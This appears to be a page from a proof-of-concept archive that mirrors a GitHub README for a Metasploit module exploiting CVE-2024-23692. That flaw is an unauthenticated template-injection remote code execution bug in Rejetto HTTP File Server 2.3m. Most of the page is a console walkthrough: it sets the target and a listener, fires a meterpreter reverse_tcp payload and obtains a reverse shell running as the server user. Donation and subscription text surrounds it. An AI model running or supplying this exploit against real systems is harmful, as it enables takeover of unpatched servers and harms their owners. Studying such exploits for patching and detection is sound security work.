Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-23692 PoC — Rejetto HTTP File Server 2.3m Unauthenticated RCE

Source
https://github.com/pradeepboo/Rejetto-HFS-2.x-RCE-CVE-2024-23692-
Associated Vulnerability
Title:Rejetto HTTP File Server 2.3m Unauthenticated RCE (CVE-2024-23692)
Description:Rejetto HTTP File Server, up to and including version 2.3m, is vulnerable to a template injection vulnerability. This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request. As of the CVE assignment date, Rejetto HFS 2.3m is no longer supported.
Description
Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)
Readme
An unauth SSTI in the Rejetto HTTP File Server (HFS).

Original finder PoC: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

Tested against versions:
2.4.0 RC7, 2.3m


**Example usage:**

```
msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
RPORT => 80
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.1.5:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[*] Sending stage (201798 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.5:43508) at 2024-07-10 09:30:44 +0103

meterpreter > getuid
Server username: test_server\john
meterpreter >
```
File Snapshot

 [4.0K]  /data/pocs/87ba189cb13ca548836e4699c413310f828ce168
└── [1.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →